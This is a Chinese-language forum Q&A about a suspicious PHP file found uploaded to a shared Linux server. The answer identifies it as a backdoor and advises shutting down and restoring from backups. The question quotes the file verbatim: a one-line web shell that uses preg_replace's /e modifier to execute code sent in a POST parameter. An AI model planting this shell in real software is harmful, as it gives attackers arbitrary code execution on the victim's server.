我刚刚发现有人将 PHP 文件上传到我们托管在共享 Linux 服务器上的应用程序,其名称为6fbb2.php这是文件的内容:
EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
有谁知道这个文件的目的是什么?我该怎么办?
答案1
该文件的目的是让某人运行任意代码在你的服务器上通过 HTTP。
你应该做的是立即关闭对站点的访问,以及服务器的其余部分(如果可以的话),找到可验证的备份以进行恢复,极其仔细地检查所有内容,以找出他们还做了什么以及他们是如何得到的首先,这样您就可以在重新启用任何内容之前修复该问题。
也可以看看:如何处理受感染的服务器?关于安全SE。